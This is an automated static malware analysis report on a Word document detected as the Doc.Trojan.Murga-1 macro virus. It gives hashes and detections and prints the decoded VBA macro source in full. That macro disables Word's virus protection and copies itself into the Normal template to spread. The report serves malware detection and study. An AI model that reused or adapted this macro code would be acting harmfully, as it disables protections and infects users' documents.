Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4b0d909f5a9dd5d3…

MALICIOUS

Office (OLE)

Size: 53.0 KB
Created: 2000-12-13 23:16:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 874c8e6221b28292662a4c0e1de21ebf
SHA-1: 8c7f28545025ea88163e2490e85df7f924aa65b4
SHA-256: 4b0d909f5a9dd5d369452e52e4c971df5314742cb9ba67561e3b54d2d1cf39e9
Risk Score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains VBA macros that attempt to disable virus protection and save a component named 'nofrx' to 'c:\sys.sys'. This component is then imported into the Normal template, suggesting an attempt at persistence or propagation. The ClamAV detection 'Doc.Trojan.Murga-1' and the embedded artifact signature 'Win.Trojan.C-286' further indicate malicious intent.

Heuristics (2)

  • ClamAV: Doc.Trojan.Murga-1 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Murga-1
  • VBA macros detected (medium, OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  1137 bytes

SHA-256: 38d2484f5fe1d2d5776509028ef7e9518ac484b9373a1a9ee79bd98799f26f06
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub FilePrint()
' NofrX.a by e[ax] ´98
' Special greetinz goes to -=PU=-
On Error GoTo kraj
 
With Options
    
    .VirusProtection = False
    .SaveNormalPrompt = False
    .ConfirmConversions = False
    
End With

If (Month(Now) = 7) And (Day(Now) = 7) Then

    MsgBox ("Danas je rodjendan Murga-drotu!!!! Ohoooooo!"), vbInformation
    ActiveDocument.VBProject.VBComponents.Item("nofrx").Export ("c:\sys.sys")
    NormalTemplate.VBProject.VBComponents.Import ("c:\sys.sys")
    
    If NormalTemplate.VBProject.VBComponents.Item("nofrx").Name <> "nofrx" Then
    NormalTemplate.VBProject.VBComponents.Import ("c:\sys.sys")
    End If
    If ActiveDocument.VBProject.VBComponents.Item("nofrx").Name <> "nofrx" Then
    ActiveDocument.VBProject.VBComponents.Import ("c:\sys.sys")
    End If
    
End If
kraj:
End Sub